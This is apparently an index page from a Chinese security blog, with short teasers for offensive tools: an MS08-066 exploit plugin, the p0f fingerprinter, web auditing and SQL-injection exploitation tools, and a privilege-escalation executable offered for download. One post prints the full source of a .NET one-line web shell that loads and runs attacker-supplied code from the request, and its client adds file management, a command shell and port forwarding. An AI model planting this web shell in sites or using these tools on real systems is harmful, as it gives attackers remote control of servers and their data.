鬼仔's Blog

Hi,

I have just uploaded a k-plugin for Kartoffel, which exploits a flaw
patched in the recent MS08-066 bulletin.

http://kartoffel.reversemode.com/downloads.php
backup: http://milw0rm.com/sploits/2008-afd_plugin.zip
阅读全文 »

来源：3w417

p0f 是继Nmap和Xprobe2之后又一款远程操作系统被动判别工具。它支持：

1. 反连SYN 模式
2. 正连SYN+ACK 模式
3. 空连RST+ 模式
4. 碎片ACK模式

p0f比较有特色的是它还可以探测：
阅读全文 »

SCRT Webshag
IntroductionWebshag is a multi-threaded, multi-platform web server audit tool. Written in Python, it gathers commonly useful functionalities for web server auditing like website crawling, URL scanning or file fuzzing.
阅读全文 »

Introduction
Mini MySqlat0r is a multi-platform application used to audit web sites in order to discover and exploit SQL injection vulnerabilities. It is written in Java and is used through a user-friendly GUI that contains three distinct modules.

The Crawler modules allows the user to view the web site structure and gather all tamperable parameters. These parameters are then sent to the Tester module that tests all parameters for SQL injection vulnerabilities. If any are found, they are then sent to the Exploiter module that can exploit the injections to gather data from the database.
阅读全文 »

鬼仔注：刚从外面回来，看到cnqing在gtalk上给我的留言，只扔给一个链接。

作者：cnqing

软件说明：
程序包 包括一个基于反射的.net 一句话木马。

<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

客户端 当前插件
文件管理
.net探针
CMDshell
端口转发
阅读全文 »

来源：WEB安全手册

DB_OWNER权限备份hta到启动项提权的小工具。

下载地址：http://dl.getdropbox.com/u/216079/dbshell.exe